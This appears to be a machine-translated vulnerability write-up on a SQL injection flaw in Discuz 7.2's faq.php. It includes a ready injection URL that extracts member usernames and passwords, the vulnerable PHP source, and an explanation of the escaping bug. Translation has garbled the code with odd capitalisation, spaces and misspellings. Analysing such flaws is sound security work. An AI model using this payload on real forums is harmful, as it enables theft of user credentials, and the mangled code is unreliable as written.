Faq of Discuz7.2. phpSQL Injection Vulnerability Analysis

This article mainly introduces the faq of Discuz7.2. phpSQL injection vulnerability analysis, including injection code and source code analysis. For more information, see

This article mainly introduces the faq of Discuz7.2. php SQL injection vulnerability analysis, including injection code and source code analysis. For more information, see

Injection code example:

The Code is as follows:

? Action = grouppermission & gids [99] = % 27 & gids [100] [0] =) and (select 1 from (select count (*), concat (select concat (username, 0x20, password) from cdb_members limit 0, 1) from 'information _ scheme '. tables limit 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x) a) % 23

Vulnerability Analysis: by phithon

The Code is as follows:

($ Action = 'grouppermission '){

...
Ksort ($ gids );
$ Groupids = array ();
Foreach ($ gids as $ row ){
$ Groupids [] = $ row [0];
}

$ Query = $ db-> query ("SELECT * FROM {$ tablepre} usergroups u left join {$ tablepre} admingroups a ON u. groupid =. admingid WHERE u. groupid IN (". implodeids ($ groupids ). ")");
...
}
Function implodeids ($ array ){
If (! Empty ($ array )){
Return "'". implode ("', '", is_array ($ array )? $ Array: array ($ array ))."'";
} Else {
Return '';
}
}

First define an array groupids, then traverse $ gids (this is also an array, that is, $ _ GET [gids]), and put the first of all values in the array in groupids.

Why does this operation cause injection?

Discuz will perform addslashes escaping on the GET array globally, that is to say, it will convert 'to \'. Therefore, if the input parameter is: gids [1] =, is converted to $ gids [1] = \ ', and the value assignment statement $ groupids [] = $ row [0] is equivalent to taking the first character of the string, that is, remove the escape characters.

Later, he processed the data with implodeids before placing it into an SQL statement. We can see the implodeids function.

A simple function is to split the $ groupids array with ',' to form a string similar to '1', '2', '3', and '4.

However, when an escape character is just obtained from our array, it will escape a normal escape character, for example:
'1', '\', '3', '4'
Is there any difference: 4th single quotes are escaped, that is, 5th single quotes and 3rd single quotes are closed.